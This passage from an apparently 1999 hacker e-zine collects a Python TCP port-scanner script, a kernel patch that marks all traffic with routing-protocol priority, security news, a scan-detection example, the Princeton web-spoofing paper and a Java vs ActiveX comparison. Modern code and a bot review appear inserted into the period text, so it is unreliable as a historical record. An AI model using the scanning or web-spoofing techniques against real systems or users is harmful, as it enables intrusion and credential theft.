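    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))          # port 0: let the kernel pick a free one
    srv.listen(16)               # backlog completes handshakes without accept()
    return srv


def free_port(host="127.0.0.1"):
    """Grab a free port number and release it, giving a known-closed port."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


def connect_scan(host, ports, timeout=2.0):
    """Return {port: 'open' | 'closed' | 'filtered'} for each port in one pass.

    All connects are started at once; select() then tells us when each socket
    becomes writable, and SO_ERROR says whether that was SYN/ACK (0) or RST
    (ECONNREFUSED). Ports that never answer before the deadline are 'filtered'.
    """
    sel = selectors.DefaultSelector()
    results = {}
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setblocking(False)
        err = s.connect_ex((host, port))
        if err == 0:                       # handshake finished synchronously
            results[port] = "open"
            s.close()
        elif err in IN_PROGRESS:           # the normal non-blocking path
            sel.register(s, selectors.EVENT_WRITE, data=port)
        else:                              # failed before leaving the host
            results[port] = "closed" if err == errno.ECONNREFUSED else "filtered"
            s.close()

    deadline = time.monotonic() + timeout
    while sel.get_map():
        remaining = deadline - time.monotonic()
        if remaining <= 0:
            break
        for key, _ in sel.select(timeout=remaining):
            s, port = key.fileobj, key.data
            err = s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
            if err == 0:
                results[port] = "open"
            elif err == errno.ECONNREFUSED:
                results[port] = "closed"
            else:
                results[port] = "filtered"
            sel.unregister(s)
            s.close()

    # Whatever is still registered never became writable: no SYN/ACK, no RST.
    for key in list(sel.get_map().values()):
        results[key.data] = "filtered"
        sel.unregister(key.fileobj)
        key.fileobj.close()
    sel.close()
    return results


if __name__ == "__main__":
    srv = start_listener()
    targets = [srv.getsockname()[1], free_port()]
    for port, state in sorted(connect_scan("127.0.0.1", targets).items()):
        print(f"{port}/tcp {state}")
    srv.close()
```

         A connect() scan completes the full handshake, so the target's application logs see
         a real connection from your address; that visibility is why the SYN, FIN, Xmas and
         NULL modes in the list above exist, and why they need raw sockets and root.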
         
         
     ++ This patch sets the tos field for IP headers to high priority and
        optimizes the IP connection for throughput, which has real effects on
        cisco routers.
        Since it is bad policy and if hundrets of lamers use it I wont like it.
        But I even more dislike hidden information, I'll let you decide wether
        to publish it, but if you decide to do it, please do it anonymously.
       
        Thanks.
       
        --- linux/net/ipv4/af_inet.c    Thu Mar 25 18:23:34 1999
        +++ linux/net/ipv4/af_inet.c    Thu Mar 25 18:23:35 1999
        @@ -408,6 +408,7 @@
                sk->timer.function = &net_timer;
        
                sk->ip_ttl=ip_statistics.IpDefaultTTL;
        +       sk->ip_tos=IPTOS_PREC_INTERNETCONTROL + IPTOS_THROUGHPUT;
         
                sk->ip_mc_loop=1;
                sk->ip_mc_ttl=1;
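        Review bot: the new default is set next to the ip_ttl default, so it applies to every new
        IPv4 socket on the host and cannot be scoped to the traffic it is meant to speed up; each
        unprivileged process now emits packets marked IPTOS_PREC_INTERNETCONTROL, a precedence
        level intended for routing-protocol traffic, which is exactly the "bad policy" the submitter
        concedes, and which a per-socket setsockopt(IP_TOS) in the application that needs it (or a
        sysctl defaulting to the old value) would express without a kernel rebuild. Two smaller
        points: combine the flag macros with `|` rather than `+`
        (`sk->ip_tos=IPTOS_PREC_INTERNETCONTROL | IPTOS_THROUGHPUT;`), since these are bit fields
        and addition only works while the bits happen to stay disjoint; and the "real effects on
        cisco routers" exist only where the upstream network honours end-host TOS bits, so the
        operational fix on the receiving side is to remark or police precedence at the edge rather
        than trust it.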
        
       
        -- name withheld at request of submitter (from PacketStorm)
          
          http://www.genocide2600.com/~tattooman/new.shtml
          <a href="http://www.genocide2600.com/~tattooman/new.shtml">New files</a>        
     
    
     ++ sMonitor
        Version 1.03 for Windows 95/98/NT 
        Copyright (c) 1998-1999 by Alexander Yarovy 

        Description 

        The program can be used to monitor Internet hosts and services running
        on them continuously. It allows you to create a list of Internet servers 
        and a task list for each of them: pings and services to check: HTTP,
        FTP, Telnet, SMTP, POP3, NNTP and any others. The complete list of 
        services and TCP ports according to RFC 1700 is included. 

        
        http://members.xoom.com/ayarovy/index.html
        <a href="http://members.xoom.com/ayarovy/index.html">Link</a>
    
     ++ Melissa virus creator cans his lawyer
        <a href="http://www.zdnet.com/zdnn/stories/news/0,4586,2237196,00.html">Story</a>
        
     
     ++ KeyPost to close

        Australia Post is set to close down its KeyPost digital certificate
        issuing authority, citing poor returns and a lower than expected 
        takeup. The closure is expected to take effect on August 1. KeyPost
        was Australia's first commercial digital certificate authority (CA).
        It kicked off operations in Victoria nearly two years ago, followed 
        by a nationwide rollout six months later. An Australia Post spokes
        person told Newswire this afternoon that ditching KeyPost was a 
        commercial decision. "The takeup was lower than expected, and we had
        anticipated greater interest from all areas of government," the 
        spokesperson said.


       http://newswire.com.au/9904/kp.htm
       <a href="http://newswire.com.au/9904/kp.htm">Story link</a>


    ++ Melissa man out on bail


       David Smith, the man arrested for allegedly creating and spreading the
       Melissa virus, will plead not guilty to a string of offences. According
       to CNet reports, the 30-year-old New Jersey man told his lawyers from
       Benedict & Altman that he would plead innocent to charges of interrupting
       public communication, conspiracy to commit the offence, theft of computer
       service, and wrongful access to computer systems. Smith has since been 
       released on $US100,000 ($A158,300) bail.


       http://newswire.com.au/9904/ngmel.htm
       <a href="http://newswire.com.au/9904/ngmel.htm">Story link</a>



    ++ Victorians step forward for IT&T awards


       Nominations have opened for the 1999 Asia-Pacific IT&T Awards, which
       recognise the innovative use of information technology and
       telecommunications, as well as the outstanding achievements of
       individuals, organisations and corporations. In Victoria, CD-ROM 
       creator Kylie Robertson and financial calculator maker Mainstream 
       Computing have announced their running.

       http://newswire.com.au/9904/nom.htm
       <a href="http://newswire.com.au/9904/nom.htm">Story link</a>
    
     Mucho thanks to Spikeman for directing his efforts to our cause of bringing
     you the news we want to read about in a timely manner ... - Ed

     @HWA

 01.2 MAILBAG - email and posts from the message board worthy of a read
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

       Yes we really do get a pile of mail in case you were wondering ;-0
       here's a sampling of some of the mail we get here, the more interesting
       ones are included and of course we had to get in the plugs for the 
       zine coz we love to receive those too *G* - Ed
       
       ================================================================       

      @HWA


  02.0  From the editor.
        ~~~~~~~~~~~~~~~~

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
     {
      printf ("Read commented source!\n\n");

     /*
      *Well this is issue #13, included with the zip file version of this
      *issue is an excellent reference on port numbers, it is included in
      *a seperate file as that file alone is nearly 289k. anyway some
      *interesting tidbits in this issue, enjoy ...
      *
      *                             - Ed
      *
      *
      */
      printf ("EoF.\n");
      }


      Congrats, thanks, articles, news submissions and kudos to us at the
     main address: hwa@press.usmc.net complaints and all nastygrams and
     mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
     127.0.0.1, private mail to cruciphux@dok.org

     danke.

     C*:.


     @HWA
     
     
 03.0 Why Business Fears Distributed Attacks
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      From buffer overflow (HNN) http://www.hackernews.com/orig/fear.html

       By: B. Houston
  
       For years, in the security industry, analysts have been spreading the anxiety of massive distributed attacks
       against sites. They have described to clients the possibility of a simultaneous, parallel system attack pulled
       off with military-like precision. To many, it looks like that day has actually arrived. During the recent attacks on the
       Pentagon, many people in the media were alluding to everything from third-world military and terrorist
       organizations to a single "script kiddie" playing with some new toys. The real truth, however, is that all these things
       may be the case, or none of them. In the Pentagon incident we have press releases, media gossip and tons of
       hype, but the one thing we don't have is the truth. Out of the whole scenario, the only things we know for sure are
       that there will be more fear and more attacks. 
  
       The problems demonstrated by the distributed attack scenario are many. First, you have the basic concept of a
       large group of system crackers attacking one system with many resources, an immense amount of bandwidth and a
       cooperative mind. System administrators, and their corporate bosses, already fear break-ins, so the chance of a
       massive-scale penetration is a natural sleep thief for them. Secondly, many administrators feel that they may be able
       to defend their systems against a lone attacker, but few believe that they could defeat an entire legion of system
       attacks across a broad band of hosts. Many feel that their current firewalls, intrusion detection systems and logging
       tools will be less effective against logically grouped attacks existing just under the delicate threshold that
       these systems monitor. In addition, you have the extended probability that a high-visibility attack may
       simply be the smokescreen or time-wasting bait used to cover a more dangerous and thorough attack elsewhere
       on the network. Lastly, and certainly not least, security administrators are alarmed at the growing availability and
       granularity of the underground knowledge base available on the Internet. New exploits are being discovered, coded,
       quantified, explained and canonized on web sites around the world at an alarming pace. 
  
       System administrators have begun to report an increase in advanced probes, port scans and specific vulnerability
       tests from the Internet. New tools available in the underground, and the increase of both raw computing
       power and low level operating systems have made this situation even more apparent. More and more underground
       users have made the switch to Linux and other free Unix based OS derivatives creating a more technical and
       programming savvy band of hackers. Or at least that is what many security experts are claiming. 
  
       On the other hand, these same new tools and bandwidth excesses make deception by the underground even easier
       than a massive attack. Many of the new tools are capable of using address spoofing, parallel scanning and other
       technologies that make even a simple port scan appear to be a "massive distributed attack". Sites are being recorded
       and published that offer access for attack pass-throughs, and these are growing in number every day as new users
       expand home networks into Internet space via cable modems and ADSL. And yes, the members of the
       underground have taken notice. 
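
       The two points above, attacks spread across many sources so that no single source crosses a
       per-host threshold, and decoy/spoofed sources that inflate the apparent attacker count, are
       really one detection problem: count what the target sees, not what each source does. The block
       below is an added example written for this issue, not something from the article or from any
       named product; the firewall log format, the addresses and the thresholds are all constructed
       for the illustration. It shows a per-source rule that fires on nothing and a per-target rule,
       over the same events, that does.

```python
"""Per-source vs. per-target scan detection over firewall deny logs (added example).

The log format, addresses and thresholds are constructed for this illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Constructed format: "<ISO ts> DENY src=<ip> dst=<ip> dport=<n> proto=<tcp|udp>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) DENY src=(?P<src>\S+) dst=(?P<dst>\S+) dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse(line):
    """Return a dict for one deny line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Treat timestamps as UTC so window bucketing does not depend on local TZ.
    ts = datetime.fromisoformat(m["ts"]).replace(tzinfo=timezone.utc).timestamp()
    return {"ts": ts, "src": m["src"], "dst": m["dst"], "dport": int(m["dport"])}


def group(events, key, window):
    """Bucket events by (key value, time window index)."""
    buckets = defaultdict(list)
    for e in events:
        buckets[(e[key], int(e["ts"] // window))].append(e)
    return buckets


def per_source_alerts(events, window=3600, port_threshold=10):
    """Classic rule: one source touching many distinct ports within the window."""
    alerts = {}
    for (src, _), evs in group(events, "src", window).items():
        ports = {e["dport"] for e in evs}
        if len(ports) >= port_threshold:
            alerts[src] = len(ports)
    return alerts


def per_target_alerts(events, window=3600, port_threshold=25, min_sources=5):
    """Distributed rule: many distinct ports on one target from several sources.

    Decoy scanning (spoofed extra sources) only raises the source count, so the
    alert still fires; it is the target-side port coverage that matters.
    """
    alerts = {}
    for (dst, _), evs in group(events, "dst", window).items():
        ports = {e["dport"] for e in evs}
        srcs = {e["src"] for e in evs}
        if len(ports) >= port_threshold and len(srcs) >= min_sources:
            alerts[dst] = (len(ports), len(srcs))
    return alerts


def make_sample_log():
    """Constructed sample: 15 hosts each probe 5 ports on one target (75 ports in ~31 minutes),
    below any sane per-source threshold, plus two unrelated denies as background noise."""
    base = datetime(1999, 4, 1, 2, 0, 0)
    lines = []
    for i in range(15):
        for j in range(5):
            ts = base + timedelta(seconds=25 * (i * 5 + j))
            lines.append(f"{ts:%Y-%m-%dT%H:%M:%S} DENY src=198.51.100.{i + 1} "
                         f"dst=192.0.2.10 dport={1000 + i * 5 + j} proto=tcp")
    lines.append(f"{base:%Y-%m-%dT%H:%M:%S} DENY src=203.0.113.7 dst=192.0.2.20 dport=80 proto=tcp")
    lines.append(f"{base:%Y-%m-%dT%H:%M:%S} DENY src=203.0.113.7 dst=192.0.2.20 dport=443 proto=tcp")
    return lines


if __name__ == "__main__":
    events = [e for e in map(parse, make_sample_log()) if e]
    print("per-source:", per_source_alerts(events))   # nothing crosses 10 ports
    print("per-target:", per_target_alerts(events))   # 192.0.2.10 -> (75 ports, 15 sources)
```

       The per-target rule is only as good as the window and the thresholds, and a target that
       legitimately serves many ports to many clients will need a higher port_threshold or an
       allowlist; the point is that the aggregation key has to be the victim, because the
       attacker chooses how many sources the logs show.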
  
       The bottom line is that business and other organizations do indeed need to fear massive distributed penetration
       attempts. These types of attacks are certainly becoming more possible and perhaps even probable, though a
       panicked reaction certainly needs to be avoided at all costs. As always, things may not be as they
       appear. The key here is to read, study and become familiar with the tools and protections available to you. And yes,
       a few tests are probably in order... 

       @HWA
       
 04.0  Hackers and Crackers
       ~~~~~~~~~~~~~~~~~~~~
       
       From corporations to universities, computer hackers are still making trouble
       - and making the law.
       
       By Kim Komando
       
       Article at http://popularmechanics.com/popmech/crnt/1HOMECRNT.html 
       
       (N.B: to be web posted 2nd week in April. If it appears in time for next issue it will appear here.)
       
       @HWA
       
 05.0  What IS frame spoofing etc anyways?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
       I've had several requests for info as to what exactly frame spoofing is, so here is what I learned
       back around 1997 when it first became common/mainstream knowledge, hopefully it will clear things
       up a bit. - Ed         

       Edward W. Felten, Dirk Balfanz, Drew Dean, and Dan S. Wallach 
       Technical Report 540-96 
       Department of Computer Science, Princeton University
       Graphics by Markus Hübner (omitted, obviously) 

       Introduction
       
       This paper describes an Internet security attack that could endanger the privacy of World Wide Web users and the integrity of their data. The attack can be carried
       out on today's systems, endangering users of the most common Web browsers, including Netscape Navigator and Microsoft Internet Explorer. 
       
       Web spoofing allows an attacker to create a "shadow copy" of the entire World Wide Web. Accesses to the shadow Web are funneled through the attacker's
       machine, allowing the attacker to monitor all of the victim's activities, including any passwords or account numbers the victim enters. The attacker can also cause
       false or misleading data to be sent to Web servers in the victim's name, or to the victim in the name of any Web server. In short, the attacker observes and controls
       everything the victim does on the Web. 
       
       We have implemented a demonstration version of this attack. 
       
       Spoofing Attacks
       
       In a spoofing attack, the attacker creates misleading context in order to trick the victim into making an inappropriate security-relevant decision. A spoofing attack is
       like a con game: the attacker sets up a false but convincing world around the victim. The victim does something that would be appropriate if the false world were
       real. Unfortunately, activities that seem reasonable in the false world may have disastrous effects in the real world. 
       
       Spoofing attacks are possible in the physical world as well as the electronic one. For example, there have been several incidents in which criminals set up bogus
       automated-teller machines, typically in the public areas of shopping malls [1]. The machines would accept ATM cards and ask the person to enter their PIN code.
       Once the machine had the victim's PIN, it could either eat the card or "malfunction" and return the card. In either case, the criminals had enough information to copy
       the victim's card and use the duplicate. In these attacks, people were fooled by the context they saw: the location of the machines, their size and weight, the way they
       were decorated, and the appearance of their electronic displays. 
       
       People using computer systems often make security-relevant decisions based on contextual cues they see. For example, you might decide to type in your bank
       account number because you believe you are visiting your bank's Web page. This belief might arise because the page has a familiar look, because the bank's URL
       appears in the browser's location line, or for some other reason. 
       
       To appreciate the range and severity of possible spoofing attacks, we must look more deeply into two parts of the definition of spoofing: security-relevant decisions
       and context. 
       
       Security-relevant Decisions
       
       By "security-relevant decision," we mean any decision a person makes that might lead to undesirable results such as a breach of privacy or unauthorized tampering
       with data. Deciding to divulge sensitive information, for example by typing in a password or account number, is one example of a security-relevant decision.
       Choosing to accept a downloaded document is a security-relevant decision, since in many cases a downloaded document is capable of containing malicious elements
       that harm the person receiving the document [2]. 
       
       Even the decision to accept the accuracy of information displayed by your computer can be security-relevant. For example, if you decide to buy a stock based on
       information you get from an online stock ticker, you are trusting that the information provided by the ticker is correct. If somebody could present you with incorrect
       stock prices, they might cause you to engage in a transaction that you would not have otherwise made, and this could cost you money. 
       
       Context 
       
       A browser presents many types of context that users might rely on to make decisions. The text and pictures on a Web page might give some impression about where
       the page came from; for example, the presence of a corporate logo implies that the page originated at a certain corporation. 
       
       The appearance of an object might convey a certain impression; for example, neon green text on a purple background probably came from Wired magazine. You
       might think you're dealing with a popup window when what you are seeing is really just a rectangle with a border and a color different from the surrounding parts of
       the screen. Particular graphical items like file-open dialog boxes are immediately recognized as having a certain purpose. Experienced Web users react to such cues
       in the same way that experienced drivers react to stop signs without reading them. 
       
       The names of objects can convey context. People often deduce what is in a file by its name. Is manual.doc the text of a user manual? (It might be another kind of
       document, or it might not be a document at all.) URLs are another example. Is MICR0S0FT.COM the address of a large software company? (For a while that address
       pointed to someone else entirely. By the way, the round symbols in MICR0S0FT here are the number zero, not the letter O.) Was dole96.org Bob Dole's 1996
       presidential campaign? (It was not; it pointed to a parody site.) 
       
       People often get context from the timing of events. If two things happen at the same time, you naturally think they are related. If you click over to your bank's page
       and a username/password dialog box appears, you naturally assume that you should type the name and password that you use for the bank. If you click on a link
       and a document immediately starts downloading, you assume that the document came from the site whose link you clicked on. Either assumption could be wrong. 
       
       If you only see one browser window when an event occurs, you might not realize that the event was caused by another window hiding behind the visible one. 
       
       Modern user-interface designers spend their time trying to devise contextual cues that will guide people to behave appropriately, even if they do not explicitly notice
       the cues. While this is usually beneficial, it can become dangerous when people are accustomed to relying on context that is not always correct. 
       
       TCP and DNS Spoofing
       
       Another class of spoofing attack, which we will not discuss here, tricks the user's software into an inappropriate action by presenting misleading information to that
       software [3]. Examples of such attacks include TCP spoofing [4], in which Internet packets are sent with forged return addresses, and DNS spoofing [5], in which
       the attacker forges information about which machine names correspond to which network addresses. These other spoofing attacks are well known, so we will not
       discuss them further. 
       
       Web Spoofing
       
       Web spoofing is a kind of electronic con game in which the attacker creates a convincing but false copy of the entire World Wide Web. The false Web looks just
       like the real one: it has all the same pages and links. However, the attacker controls the false Web, so that all network traffic between the victim's browser and the
       Web goes through the attacker. 
       
       Consequences
       
       Since the attacker can observe or modify any data going from the victim to Web servers, as well as controlling all return traffic from Web servers to the victim, the
       attacker has many possibilities. These include surveillance and tampering. 
       
       Surveillance The attacker can passively watch the traffic, recording which pages the victim visits and the contents of those pages. When the victim fills out a form,
       the entered data is transmitted to a Web server, so the attacker can record that too, along with the response sent back by the server. Since most on-line commerce
       is done via forms, this means the attacker can observe any account numbers or passwords the victim enters. 
       
       As we will see below, the attacker can carry out surveillance even if the victim has a "secure" connection (usually via Secure Sockets Layer) to the server, that is,
       even if the victim's browser shows the secure-connection icon (usually an image of a lock or a key). 
       
       Tampering The attacker is also free to modify any of the data traveling in either direction between the victim and the Web. The attacker can modify form data
       submitted by the victim. For example, if the victim is ordering a product on-line, the attacker can change the product number, the quantity, or the ship-to address. 
       
       The attacker can also modify the data returned by a Web server, for example by inserting misleading or offensive material in order to trick the victim or to cause
       antagonism between the victim and the server. 
       
       Spoofing the Whole Web
       
       You may think it is difficult for the attacker to spoof the entire World Wide Web, but it is not. The attacker need not store the entire contents of the Web. The whole
       Web is available on-line; the attacker's server can just fetch a page from the real Web when it needs to provide a copy of the page on the false Web. 
       
       How the Attack Works
       
       The key to this attack is for the attacker's Web server to sit between the victim and the rest of the Web. This kind of arrangement is called a "man in the middle
       attack" in the security literature. 
       
       URL Rewriting
       
       The attacker's first trick is to rewrite all of the URLs on some Web page so that they point to the attacker's server rather than to some real server. Assuming the
       attacker's server is on the machine www.attacker.org, the attacker rewrites a URL by adding http://www.attacker.org to the front of the URL. For example,
       http://home.netscape.com becomes http://www.attacker.org/http://home.netscape.com. (The URL rewriting technique has been used for other
       reasons by two other Web sites, the Anonymizer and the Zippy filter. See page 9 for details.) 
       
       Figure 1 shows what happens when the victim requests a page through one of the rewritten URLs. The victim's browser requests the page from
       www.attacker.org, since the URL starts with http://www.attacker.org. The remainder of the URL tells the attacker's server where on the Web to go to get
       the real document.
       
       
       
       
       
       
       Figure 1: An example Web transaction during a Web spoofing attack. The victim requests a Web page. The following steps occur: (1) the victim's browser requests
       the page from the attacker's server; (2) the attacker's server requests the page from the real server; (3) the real server provides the page to the attacker's server; (4)
       the attacker's server rewrites the page; (5) the attacker's server provides the rewritten version to the victim. 
       
       
       
       Once the attacker's server has fetched the real document needed to satisfy the request, the attacker rewrites all of the URLs in the document into the same special
       form by splicing http://www.attacker.org/ onto the front. Then the attacker's server provides the rewritten page to the victim's browser. 
       
       Since all of the URLs in the rewritten page now point to www.attacker.org, if the victim follows a link on the new page, the page will again be fetched through the
       attacker's server. The victim remains trapped in the attacker's false Web, and can follow links forever without leaving it. 
       
       Forms
       
       If the victim fills out a form on a page in a false Web, the result appears to be handled properly. Spoofing of forms works naturally because forms are integrated
       closely into the basic Web protocols: form submissions are encoded in URLs and the replies are ordinary HTML. Since any URL can be spoofed, forms can also be
       spoofed. 
       
       When the victim submits a form, the submitted data goes to the attacker's server. The attacker's server can observe and even modify the submitted data, doing
       whatever malicious editing desired, before passing it on to the real server. The attacker's server can also modify the data returned in response to the form submission.
       
       "Secure" connections don't help
       
       One distressing property of this attack is that it works even when the victim requests a page via a "secure" connection. If the victim does a "secure" Web access (a
       Web access using the Secure Sockets Layer) in a false Web, everything will appear normal: the page will be delivered, and the secure connection indicator (usually
       an image of a lock or key) will be turned on. 
       
       The victim's browser says it has a secure connection because it does have one. Unfortunately the secure connection is to www.attacker.org and not to the place
       the victim thinks it is. The victim's browser thinks everything is fine: it was told to access a URL at www.attacker.org so it made a secure connection to
       www.attacker.org. The secure-connection indicator only gives the victim a false sense of security. 
       
       Starting the Attack
       
       To start an attack, the attacker must somehow lure the victim into the attacker's false Web. There are several ways to do this. An attacker could put a link to a false
       Web onto a popular Web page. If the victim is using Web-enabled email, the attacker could email the victim a pointer to a false Web, or even the contents of a page
       in a false Web. Finally, the attacker could trick a Web search engine into indexing part of a false Web. 
       
       Completing the Illusion
       
       The attack as described thus far is fairly effective, but it is not perfect. There is still some remaining context that can give the victim clues that the attack is going on.
       However, it is possible for the attacker to eliminate virtually all of the remaining clues of the attack's existence. 
       
       Such evidence is not too hard to eliminate because browsers are very customizable. The ability of a Web page to control browser behavior is often desirable, but
       when the page is hostile it can be dangerous. 
       
       The Status Line
       
       The status line is a single line of text at the bottom of the browser window that displays various messages, typically about the status of pending Web transfers. 
       
       The attack as described so far leaves two kinds of evidence on the status line. First, when the mouse is held over a Web link, the status line displays the URL the link
       points to. Thus, the victim might notice that a URL has been rewritten. Second, when a page is being fetched, the status line briefly displays the name of the server
       being contacted. Thus, the victim might notice that www.attacker.org is displayed when some other name was expected. 
       
       The attacker can cover up both of these cues by adding a JavaScript program to every rewritten page. Since JavaScript programs can write to the status line, and
       since it is possible to bind JavaScript actions to the relevant events, the attacker can arrange things so that the status line participates in the con game, always
       showing the victim what would have been on the status line in the real Web. Thus the spoofed context becomes even more convincing. 
       
       The Location Line
       
       The browser's location line displays the URL of the page currently being shown. The victim can also type a URL into the location line, sending the browser to that
       URL. The attack as described so far causes a rewritten URL to appear in the location line, giving the victim a possible indication that an attack is in progress. 
       
       This clue can be hidden using JavaScript. A JavaScript program can hide the real location line and replace it by a fake location line which looks right and is in the
       expected place. The fake location line can show the URL the victim expects to see. The fake location line can also accept keyboard input, allowing the victim to type
       in URLs normally. Typed-in URLs can be rewritten by the JavaScript program before being accessed. 
       
       Viewing the Document Source
       
       There is one clue that the attacker cannot eliminate, but it is very unlikely to be noticed. 
       
       By using the browser's "view source" feature, the victim can look at the HTML source for the currently displayed page. By looking for rewritten URLs in the HTML
       source, the victim can spot the attack. Unfortunately, HTML source is hard for novice users to read, and very few Web surfers bother to look at the HTML source
       for documents they are visiting, so this provides very little protection. 
       
       A related clue is available if the victim chooses the browser's "view document information" menu item. This will display information including the document's real
       URL, possibly allowing the victim to notice the attack. As above, this option is almost never used so it is very unlikely that it will provide much protection. 
       
       Bookmarks
       
       There are several ways the victim might accidentally leave the attacker's false Web during the attack. Accessing a bookmark or jumping to a URL by using the
       browser's "Open location" menu item might lead the victim back into the real Web. The victim might then reenter the false Web by clicking the "Back" button. We
       can imagine that the victim might wander in and out of one or more false Webs. Of course, bookmarks can also work against the victim, since it is possible to
       bookmark a page in a false Web. Jumping to such a bookmark would lead the victim into a false Web again. 
       
       Tracing the Attacker
       
       Some people have suggested that this attack can be deterred by finding and punishing the attacker. It is true that the attacker's server must reveal its location in order
       to carry out the attack, and that evidence of that location will almost certainly be available after an attack is detected. 
       
       Unfortunately, this will not help much in practice because attackers will break into the machine of some innocent person and launch the attack there. Stolen machines
       will be used in these attacks for the same reason most bank robbers make their getaways in stolen cars. 
       
       Remedies
       
       Web spoofing is a dangerous and nearly undetectable security attack that can be carried out on today's Internet. Fortunately there are some protective measures you
       can take. 
       
       Short-term Solution
       
       In the short run, the best defense is to follow a three-part strategy: 
       
           1. disable JavaScript in your browser so the attacker will be unable to hide the evidence of the attack; 
           2. make sure your browser's location line is always visible; 
           3. pay attention to the URLs displayed on your browser's location line, making sure they always point to the server you think you're connected to. 
       
       This strategy will significantly lower the risk of attack, though you could still be victimized if you are not conscientious about watching the location line. 
       
       At present, JavaScript, ActiveX, and Java all tend to facilitate spoofing and other security attacks, so we recommend that you disable them. Doing so will cause you
       to lose some useful functionality, but you can recoup much of this loss by selectively turning on these features when you visit a trusted site that requires them. 
       
       Long-term Solution
       
       We do not know of a fully satisfactory long-term solution to this problem. 
       
       Changing browsers so they always display the location line would help, although users would still have to be vigilant and know how to recognize rewritten URLs. 
       
       For pages that are not fetched via a secure connection, there is not much more that can be done. 
       
       For pages fetched via a secure connection, an improved secure-connection indicator could help. Rather than simply indicating a secure connection, browsers should
       clearly say who is at the other end of the connection. This information should be displayed in plain language, in a manner intelligible to novice users; it should say
       something like "Microsoft Inc." rather than "www.microsoft.com." 
       
       Every approach to this problem seems to rely on the vigilance of Web users. Whether we can realistically expect everyone to be vigilant all of the time is debatable. 
       
       Related Work
       
       We did not invent the URL rewriting technique. Previously, URL rewriting has been used as a technique for providing useful services to people who have asked for
       them. 
       
       We know of two existing services that use URL rewriting. The Anonymizer, written by Justin Boyan at Carnegie Mellon University, is a service that allows users to
       surf the Web without revealing their identities to the sites they visit. The Zippy filter, written by Henry Minsky, presents an amusing vision of the Web with
       Zippy-the-Pinhead sayings inserted at random. 
       
       Though we did not invent URL rewriting, we believe we are the first to realize its full potential as one component of a security attack. 
       
       Acknowledgments
       
       The URL-rewriting part of our demonstration program is based on Henry Minsky's code for the Zippy filter. We are grateful to David Hopwood for useful
       discussions about spoofing attacks, and to Gary McGraw and Laura Felten for comments on drafts of this paper. The figure was designed by Gary McGraw. 
       
       For More Information
       
       More information is available from our Web page at http://www.cs.princeton.edu/sip, or from Prof. Edward Felten at felten@cs.princeton.edu or (609) 258-5906. 
       
       
           
       @HWA
       
       
 06.0  What should I fear from Java and ActiveX?
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Security Tradeoffs: Java vs. ActiveX

       An Unofficial View from the Princeton Secure Internet Programming Team


       Last modified: Mon Apr 28 00:07:39 EDT 1997 

         + What are Java and ActiveX?
       
       Java and ActiveX are two systems that let people attach computer programs to Web pages. People like these systems because they allow Web
       pages to be much more dynamic and interactive than they could be otherwise. 
       
       However, Java and ActiveX do introduce some security risk, because they can cause potentially hostile programs to be automatically
       downloaded and run on your computer, just because you visited some Web page. The downloaded program could try to access or damage the
        data on your machine, for example to insert a virus. Both Java and ActiveX take measures to protect you from this risk. 
       
       There has been a lot of public debate over which system offers better security. This page gives our opinion on this debate. Java and ActiveX
       take fundamentally different approaches to security. We will concentrate on comparing the approaches, rather than critiquing the details of the
       two systems. After all, details can be fixed. 
       
        +  Who are the players?
       
       Java was developed by JavaSoft, a division of Sun Microsystems. Java is supported by both of the major browsers, Netscape Navigator and
       Microsoft Internet Explorer. 
       
       ActiveX was developed by Microsoft. It is supported in Microsoft's Internet Explorer, and an ActiveX plug-in is available for Netscape Navigator. 
       
       The most intense public debate about security has been between JavaSoft and Microsoft. Each company has accused the other of being
       careless about security, and some misleading charges have been made. 
       
        +  How does security work in ActiveX?
       
       ActiveX security relies entirely on human judgement. ActiveX programs come with digital signatures from the author of the program and anybody
       else who chooses to endorse the program. 
       
       Think of a digital signature as being like a person's signature on paper. Your browser can look at a digital signature and see whether it is
       genuine, so you can know for sure who signed a program. (That's the theory, at least. Things don't always work out so neatly in practice.) 
       
       Once your browser has verified the signatures, it tells you who signed the program and asks you whether or not to run it. You have two choices:
       either accept the program and let it do whatever it wants on your machine, or reject it completely. 
       
       ActiveX security relies on you to make correct decisions about which programs to accept. If you accept a malicious program, you are in big
       trouble. 
       
        +  How does security work in Java?
       
       Java security relies entirely on software technology. Java accepts all downloaded programs and runs them within a security "sandbox". Think of
       the sandbox as a security fence that surrounds the program and keeps it away from your private data. As long as there are no holes in the fence,
       you are safe. 
       
       Java security relies on the software implementing the sandbox to work correctly. 
       
        +  How can ActiveX security break down?
       
       The main danger in ActiveX is that you will make the wrong decision about whether to accept a program. One way this can happen is that some
       person you trust turns out not to deserve that trust. 
       
       The most dangerous situation, though, is when the program is signed by someone you don't know anything about. You'd really like to see what
       this program does, but if you reject it you won't be able to see anything. So you rationalize: the odds that this particular program is hostile are
       very small, so why not go ahead and accept it? After all, you accepted three programs yesterday and nothing went wrong. It's just human nature
       to accept the program. 
       
       Even if the risk of accepting one program is low, the risk adds up when you repeatedly accept programs. And when you do get the one bad
       program, there is no limit on how much damage it can do. 
       
       The only way to avoid this scenario is to refuse all programs, no matter how fun or interesting they sound, except programs that come from a few
       people you know well. Who has the self-discipline to do that? 
       
        +  How can Java security break down?
       
       The main danger in Java comes from the complexity of the software that implements the sandbox. Common sense says that complicated
       technology is more likely to break down than simple technology. Java is pretty complicated, and several breakdowns have happened in the past.
       
       If you're the average person, you don't have the time or the desire to examine Java and look for implementation errors. So you have to hope the
